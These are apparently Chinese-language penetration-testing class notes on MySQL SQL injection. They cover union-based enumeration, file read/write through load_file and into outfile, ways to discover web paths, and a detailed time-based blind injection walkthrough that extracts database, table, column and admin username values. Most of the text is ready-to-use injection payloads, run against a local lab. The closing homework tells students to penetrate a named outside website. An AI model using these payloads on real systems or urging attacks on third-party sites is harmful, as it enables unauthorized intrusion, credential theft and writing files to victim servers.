小迪16期-20170313

第四天：mysql权限渗透-mysql盲注攻击（上）

1.分析上节课的作业：获取所有数据库名的注入语句怎么写？

• 抓包工具分析注入工具语句
  先网上下载工具注入工具havij 1.17 pro版本和抓包工具WSExplorer
• 通过数据库属性分析注入语句
  information_schema.schemata 存储mysql下所有数据库名信息的表名
  schema_name 数据库名

http://127.0.0.1/sqlin/mysql/index.php?x=1 union select schema_name,2,3 from information_schema.schemata

---

2.实验：测试不同数据库用户的操作权限

文件读写测试：读就是load_file()，写就是into outfile()

• Mysql最高权限用户root：可读可写
  

  root读写权限.jpg
  注意：如发现读取时为NULL，直接执行show global variables like '%secure%'; 发现secure_file_priv的值为NULL，然后修改mysql.ini 文件，在[mysqld] 下加入secure_file_priv =
  保存，重启mysql。这样就能读到内容了。

• Mysql普通权限用户：无权限文件读写。

---

3.注入点数据库用户权限由什么决定？

连接数据库用户决定

连接用户.jpg

---

4.Mysql注入点进行文件读写操作

条件：root权限注入点
读取语句：读取C盘下123.txt文件内容
http://127.0.0.1/sqlin/mysql/index.php?x=1%20union%20select%20load_file(%27c:/123.txt%27),2,3
写入语句：
http://127.0.0.1/sqlin/mysql/index.php?x=1%20union%20select%20%27abcd%27,2,3%20into%20outfile%20%27c:/www2.txt%27
注意事项：

• 符号问题
  使用“/”或“\”；不使用“\”
  原因：编程中“\”多半是转义，如\n是换行

  
  符号问题.jpg
• 编码问题
  如果要写入数据中带有单引号，怎么办？
  编码解决！（用编码就不用单引号）
  比如：
  http://127.0.0.1/sqlin/mysql/index.php?x=1 union select 0x6161616127,2,3 into outfile 'c:/1234.txt'
  这里的十六进制表示的就是aaaa'

---

5.网站路径获取方法

• 遗留文件
  一般在网站根目录下，命名有php.php、info.php、
  phpinfo.php、test.php、php_info.php等。

  
  phpinfo.png

• 报错显示

  
  报错显示.png

• 漏洞暴路径

  
  漏洞暴路径.png

• 读取搭建平台配置文件

  
  vhosts.png

• 社工（字典猜解，谷歌黑客等）
  盲猜D:/www/
  D:/wwwroot/
  D:/web/
  等

  
  谷歌黑客.png

---

6.Mysql盲注

• sleep盲注攻击
  比如select * from news where id=1 union select database(),2,sleep(5)

  
  sleep盲注.png
  

  能正常执行，并在5秒后出结果，证明可以正常执行。用sleep可以判断你写的语句对不对。

• If(条件,true,false)：
  条件成立，返回第二个参数，反之返回第三个参数
  比如select * from news where id=1 union select 1,2,sleep(if(length(database())=5,5,0))
  判断数据库长度是否等于5，如果等于5就延迟5秒，不等于就不延迟。
  又比如select * from news where id=1 union select database(),2,sleep(if(mid(database(),1,1)='s',5,0))
  查询数据库名称第一个字母是不是等于's'的，是就延迟5秒。
  （mid函数有三个参数，第一个是字符串，第二个是从哪里开始截取，第三个是截取的长度）

7.Mysql盲注扩展资料

image.png

盲注的核心是靠 if 判断来注入

手工盲注之前先复习一下if 判断等函数
version() 是查看数据库版本
database() 查看数据库名
user() 查看当前用户
length( xxxxx ) 函数是统计字符串的长度

image.png

mid(str,1,3) 字符串截取

image.png

从字节1开始截 截到3就结束

ORD() 转换成ascii码

image.png
image.png

IF 语法：

image.png

if (条件,True,False);

image.png

开始手工盲注
select * from admin where user = "admin" and sleep(2); 执行需要2秒

1.获取数据库名长度

database() 查看数据库名

image.png

( select length(database() ) )
查询数据库名长度

image.png

select * from admin where user = "admin" and sleep( if( ( select length(database()) = 2 ) , 5,0 ) );
如果数据库的长度等于2的话那么就执行true 否则就执行False
最后变成了 sleep(0)

image.png
如果数据库长度等于 7 的话 就执行true
最后变成了 sleep(5)
也就是select * from admin where user = "admin” and sleep(5)
最后得知数据库长度是 7 那么接下来就是获取数据库名了。

2.获取数据库名

数据库长度是 7
select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'a' ) , 5,0 ) );
执行执行False 说明 第一个字节不是a

image.png

select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'x' ) , 5,0 ) );
执行执行true 执行了5秒 说明第一个字节是x

然后慢慢注入到7。。。。。。
select * from admin where user = "admin" and sleep( if( (select mid(database(),1,1) = 'x') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),2,1) = 'i' ) , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),3,1) = 'n') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),4,1) = 'd') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),5,1) = 'o') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),6,1) = 'n') , 5,0 ) );
select * from admin where user = "admin" and sleep( if( (select mid(database(),7,1) = 'g') , 5,0 ) );
第一个字节是x
第二个字节是i
第三个字节是n
第四个字节是d
第五个字节是o
第六个字节是n
第七个字节是g
全都是执行 5秒 然后得知 数据库是 xindong

当然了 这方法注入比较慢 比如有些数据库是特殊符号呢？那怎么办？一个一个符号猜解吗？
采用ORD函数进行ascii码来判断会快点

比如：
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 200 , 5,0 ) );
条件：大于200 执行false 说明 不大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 100 , 5,0 ) );
条件：大于100 执行true 说明大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 120 , 5,0 ) );
条件：大于120 执行false 说明不大于
select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) > 110 , 5,0 ) );
条件：大于110 执行true 说明大于
说明数据库第一个字节的ascii码大于110小于120
说明是110～120之间

select * from admin where user = "admin" and sleep( if( ORD((select mid(database(),1,1))) = 120 , 5,0 ) );
等于 120 执行true 说明第一个字节的ascii码是120

image.png

最后解码得出是 x

3.获取表名长度

select * from admin where user = 'admin' and 1=2 union select 1, sleep(if( length(TABLE_NAME) = 5 ,5,0)) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1

长度等于 5 执行true，等待5秒
说明表名长度为5

4.获取表名

获取第1个字节
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,1,1))='a' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
请求时间为5秒 说明是a

获取第2个字节

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,2,1))='d' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
请求时间为5秒 说明是d

获取第3个字节

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,3,1))='m' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
请求时间为5秒 说明是m

获取第4个字节

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,4,1))='i' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
请求时间为5秒 说明是i

获取第5个字节

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( (select mid(TABLE_NAME,5,1))='n' ,5,0) ) from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1;
请求时间为5秒 说明是n

5.获取表名的第一个字段长度

表名是:admin 16进制：61646d696e
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (length(COLUMN_NAME) = 4,5,0 ) ) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;

请求时间5秒 说明第一个子段有4个字节

6.获取表名的第一个字段名

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,1,1) )= 'u',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,2,1) )= 's',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,3,1) )= 'e',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;

select * from admin where user = 'admin' and 1=2 union select 1,sleep( if( ( select mid(COLUMN_NAME,4,1) )= 'r',5,0)) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 0,1;

爆出第一个字段是 user

然后第一个字段判断可能是用户名 还少来个密码字段那么就在 5.获取表名的第一个字段长度 把limit 1,1 获取下一个字段长度再进行获取密码字段

7.获取数据库内容

7.1 先猜第一个字段的数据库的长度
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (length(user) = 5 , 5,0) ) from admin limit 0,1;
执行5秒 说明这个字段的数据内容字节长度是5

那么就是获取数据了
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,1,1) = 'a' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,2,1) = 'd' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,3,1) = 'm' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,4,1) = 'i' , 5,0) ) from admin limit 0,1;
select * from admin where user = 'admin' and 1=2 union select 1,sleep( if (mid(user,5,1) = 'n' , 5,0) ) from admin limit 0,1;

然后用户名就是 admin 了

作业：http://www.gaoneng.com/
去渗透这个网站